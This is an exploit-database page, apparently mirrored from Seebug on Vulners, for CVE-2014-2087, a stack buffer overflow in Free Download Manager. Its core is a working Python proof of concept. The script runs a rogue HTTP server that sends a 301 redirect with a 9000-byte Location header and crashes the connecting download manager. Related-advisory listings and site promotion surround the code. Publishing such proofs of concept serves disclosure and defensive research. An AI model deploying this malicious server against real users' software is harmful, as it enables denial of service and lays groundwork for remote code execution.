Lucene search
+L

Free Download Manager 'Downloads_Deleted.cpp'栈缓冲区溢出漏洞

🗓️ 17 Mar 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 23 Views

Download Manager 'Downloads_Deleted.cpp' Stack Buffer Overflow Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Free Download Manager 3.x Buffer Overflow Vulnerability
15 Mar 201400:00
zdt
zdt
zdt
Free Download Manager - Stack-based Buffer Overflow Vulnerability
17 Mar 201400:00
zdt
githubexploit
GithubExploit
Exploit for Cross-site Scripting in Astaro Security_Gateway_Software
30 Apr 201915:15
githubexploit
attackerkb
ATTACKERKB
CVE-2014-2087
18 Mar 201417:04
attackerkb
circl
Circl
CVE-2014-2087
17 Mar 201400:00
circl
cve
CVE
CVE-2014-2087
18 Mar 201414:00
cve
cvelist
Cvelist
CVE-2014-2087
18 Mar 201414:00
cvelist
exploitdb
Exploit DB
Free Download Manager - Stack Buffer Overflow
17 Mar 201400:00
exploitdb
exploitpack
exploitpack
Free Download Manager - Stack Buffer Overflow
17 Mar 201400:00
exploitpack
kaspersky
Kaspersky
KLA10430 RCE vulnerability in Free Download Manager
18 Mar 201400:00
kaspersky
Rows per page

                                                #!/usr/bin/python
from socket import *
from time import sleep
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
junk0 = "\x43" * 9000
payload = junk0
buffer = "HTTP/1.1 301 Moved Permanently\r\n"
buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"
buffer += "Server: Apache/2.2.22 (Debian)\r\n"
buffer += "Location: "+ payload + "\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 8000\r\n"
buffer += "Keep-Alive: timeout=5, max=100\r\n"
buffer += "Connection: Keep-Alive\r\n"
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
buffer += "\r\n"
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
buffer += "<html><head>\n"
buffer += "<title>301 Moved Permanently</title>\n"
buffer += "</head><body>\n"
buffer += "<h1>Moved Permanently</h1>\n"
buffer += "<p>The document has moved <a
href=\""+payload+"\">here</a>.</p>\n"
buffer += "</body></html>\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(1)
cl.close()
s.close()
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Mar 2014 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.16729
23